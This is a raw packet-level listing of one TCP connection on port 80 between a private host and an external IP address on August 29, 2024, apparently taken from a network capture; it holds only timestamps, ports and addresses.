Aug 29, 2024 15:42:50.439297915 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.439317942 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.439332962 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.439347982 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.439353943 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.439367056 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.439373016 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.439389944 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.439389944 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.439389944 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.439409018 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.439429045 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.439429045 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.439440966 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.439456940 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.439465046 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.439480066 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.439485073 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.439519882 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.439519882 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.810211897 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.810254097 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.810271025 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.810286999 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.810307980 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.810323000 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.810342073 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.810342073 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.810344934 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.810359955 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.810384989 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.810393095 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.810401917 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.810425997 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.810431957 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.810431957 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.810447931 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.810463905 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.810465097 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.810481071 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.810482025 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.810498953 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.810519934 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.810519934 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.810560942 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.810585022 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.810600042 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.810615063 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.810631037 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.810662031 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.810684919 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.810693026 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.810709953 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.810725927 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.810743093 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.810753107 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.810754061 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.810758114 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.810767889 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.810775042 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.810789108 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.810791969 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.810808897 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.810823917 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.810823917 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.810825109 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.810843945 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.810844898 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.810863018 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.810883999 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.810883999 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.811131001 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.811156988 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.811172009 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.811181068 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.811188936 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.811203003 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.811204910 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.811216116 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.811222076 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.811238050 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.811254978 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.811254978 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.811274052 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.811274052 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.811280012 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.811295033 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.811319113 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.811333895 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.811341047 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.811341047 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.811351061 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.811368942 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.811372042 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.811372042 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.811384916 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.811403036 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.811403036 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.811404943 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.811419964 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.811451912 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.811656952 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.811672926 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.811688900 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.811707020 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.811707973 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.811707973 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.811723948 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.811728001 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.811743975 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.811762094 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.811780930 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.811783075 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.811783075 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.811783075 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.811808109 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.811815977 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.811815977 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.811825037 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.811842918 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.811842918 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.811857939 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.811862946 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.811875105 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.811899900 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.811899900 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.811899900 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.811918020 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.811918974 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.811937094 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.811940908 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.811954975 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.811970949 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.811970949 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.811974049 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.811992884 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.811996937 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.812010050 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.812024117 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.812024117 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.812035084 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.812050104 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.812055111 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.812072039 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.812088013 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.812093019 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.812093019 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.812105894 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.812109947 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.812122107 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.812140942 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.812144995 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.812144995 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.812172890 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.812187910 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.812573910 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.812589884 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.812603951 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.812618971 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.812622070 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.812635899 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.812642097 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.812653065 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.812654972 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.812669992 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.812674046 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.812688112 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.812688112 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.812695980 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.812721014 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.812736034 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.812736988 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.812771082 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.812771082 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.812791109 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.812855005 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.812870979 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.812890053 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.812897921 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.812906981 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.812913895 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.812923908 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.812938929 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.812938929 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.812938929 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.812956095 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.812958002 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.812975883 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.812983036 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.812992096 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.813008070 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.813019991 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.813019991 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.813024998 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.813045025 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.813046932 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.813046932 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.813061953 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.813069105 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.813079119 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.813096046 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.813103914 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.813103914 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.813112020 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.813128948 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.813129902 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.813147068 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.813147068 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.813167095 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.813167095 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.813188076 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.813550949 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.813566923 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.813581944 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.813597918 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.813610077 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.813610077 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.813616037 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.813627958 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.813644886 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.813677073 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.813713074 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.813729048 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.813745022 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.813754082 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.813767910 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.813785076 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.813785076 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.813790083 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.813807964 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.813807964 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.813824892 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.813841105 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.813848019 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.813848019 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.813858032 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.813864946 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.813875914 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.813879967 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.813889980 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.813890934 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.813921928 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.813961983 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.814035892 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.814054012 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.814069033 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.814084053 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.814088106 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.814102888 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.814120054 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.814126015 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.814136982 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.814151049 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.814153910 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.814169884 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.814171076 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.814188957 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.814194918 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.814203978 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.814244032 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.814244032 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.814470053 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.814486027 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.814512968 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.814538956 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.814610958 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.814626932 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.814642906 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.814659119 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.814667940 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.814667940 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.814676046 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.814678907 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.814693928 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.814699888 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.814709902 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.814712048 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.814733028 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.814738035 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.814754009 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.814769983 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.814771891 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.814771891 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.814785957 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.814790964 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.814802885 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.814819098 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.814826012 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.814826012 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.814836979 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.814851999 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.814853907 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.814853907 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.814870119 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.814874887 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.814886093 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.814893961 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.814907074 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.814913034 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.814923048 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.814939022 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.814939022 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.814939976 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.814956903 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.814964056 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.814975023 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.814977884 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.814990997 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.815006971 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.815006971 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.815006971 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.815045118 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.815045118 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.815395117 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.815411091 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.815424919 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.815442085 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.815464973 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.815479994 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.815546989 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.815572023 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.815589905 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.815606117 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.815620899 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.815634012 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.815634012 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.815637112 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.815653086 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.815664053 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.815670013 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.815692902 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.815707922 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.815707922 CEST	49704	80	192.168.2.5	185.215.113.100
